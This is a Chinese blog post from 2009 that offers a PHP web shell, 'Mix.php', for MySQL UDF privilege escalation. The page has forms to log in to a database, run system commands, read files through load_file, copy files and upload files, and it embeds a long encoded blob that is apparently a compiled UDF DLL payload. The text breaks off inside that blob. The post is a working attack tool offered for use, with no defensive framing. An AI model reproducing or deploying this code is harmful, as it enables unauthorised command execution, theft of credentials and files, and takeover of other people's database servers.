教你利用Mix.dll My_udf.dll提升权限的代码

2009年7月26日星期日 | | 0 评论 |


  

 
下面是Mix.dll的代码复制保存为Mix.php文件:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>∷ Mysql提权的Mix∷ </title>
<STYLE>
body{ SCROLLBAR-FACE-COLOR: #719BC5; FONT-SIZE: 12px; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #ffffff; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-TRACK-COLOR: #ffffff; FONT-FAMILY: "宋体"; SCROLLBAR-DARKSHADOW-COLOR: #ffffff
font-family: 宋体;   font-size: 9pt}

INPUT {BORDER: 1px none silver; }
</STYLE>
</head>
<body>
<form name="form" method=POST action="<?$_SERVER[PHP_SELF]?>" enctype="multipart/form-data">
<p>MySQL用户名:
    <input name="name" type="text" id="name" value="<? echo $_SESSION[name];?>" style="border: 1px solid #084B8E">
SQL密码:&nbsp;
<input name="pass" type="password" id="pass" value="<?echo $_POST[pass];?>" style="border: 1px solid #084B8E">
<br>
主机地址:&nbsp;&nbsp;&nbsp;   
<input name="host" type="text" id="host" value="<?echo $_POST[host];?>" style="border: 1px solid #084B8E">
主机端口:   
<input name="port" type="text" id="port" value="<?echo $_POST[port];?>" style="border: 1px solid #084B8E">
<input type="submit" value="登陆主机" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5">
</p>
<p>
      <input type="text" name="cmd" size=52 style="border: 1px solid #084B8E">
    <input type="submit" value="执行命令" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5">
    <font size="2" color="#084B8E">&nbsp;&nbsp;</font></p>
<input type="text" name="file" size=52 style="border: 1px solid #084B8E">
    <input type="submit" value="读取文件" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5">
    <font size="2" color="#084B8E">&nbsp;&nbsp;</font></p>
源文件地址:&nbsp;&nbsp;
<input type="text" name="sourcefile" size=39 style="border: 1px solid #084B8E">
<br>
目标文件地址:
<input type="text" name="targetfile" size=39 style="border: 1px solid #084B8E">
    <input type="submit" value="复制文件" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5">
    <font size="2" color="#084B8E">&nbsp;&nbsp;</font></p>
<input type="hidden" name="MAX_FILE_SIZE" value="2000000">
<font size="2" color="#084B8E">&nbsp;&nbsp;</font></p>
选择上传文件:&nbsp;&nbsp;
<input type="file" name="upload" size=39 style="border: 1px solid #084B8E">
<br>
上传到:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<input type="text" name="filepath" size=39 style="border: 1px solid #084B8E">
    <input type="submit" value="上传文件" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5">

<p><font color=#3F5294 style='FONT-SIZE: 9pt'>
<?
//读取文件函数
function echofile($file)
{

$query="select test from jnc_temp";
$file = str_replace("\\", '/', $file);
@mysql_query("delete from jnc_temp where 1=1");
if( mysql_query("insert into jnc_temp values(load_file('$file'))") )
{
$result = mysql_query($query);
while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
        $row['test']=str_replace(" ","&nbsp;",$row['test']);
   $row['test']=str_replace("<","&lt;",$row['test']);
   $row['test']=str_replace(">","&gt;",$row['test']);
   $row['test']=str_replace(chr(13),"<br>",$row['test']);
   return $row['test'];
}
}
}

function reverse_string($string)
{

$string=str_replace("&nbsp;"," ",$string);
$string=str_replace("&lt;","<",$string);
$string=str_replace("&gt;",">",$string);
$string=str_replace("<br>",chr(13),$string);
return $string;

}

function logout()
{
@mysql_free_result($result);
@mysql_query("Drop TABLE jnc_temp");
@mysql_query("DROP FUNCTION exec");
@mysql_close();
$_SESSION["mix_ok"]="No";
$_SESSION["logon"]="No";
//$_SESSION["dbusername"]='';
//$_SESSION["dbpassword"]='';
//$_SESSION["servername"]='';
//$_SESSION["serverport"]='';
}

//系统变量初试化
session_start();
$logon='No';
$system='';

session_register("logon");

//用到的变量

$servername='localhost';
if($_POST[host]!='') $servername=$_POST[host];
$serverport='3306';
if($_POST[port]!='') $serverport=$_POST[port];
$dbusername='root';
if($_POST[name]!='') $dbusername=$_POST[name];
$dbpassword='';
if($_POST[pass]!='') $dbpassword=$_POST[pass];
$dbname='mysql';

$file="c:\boot.ini";

$Mixdll="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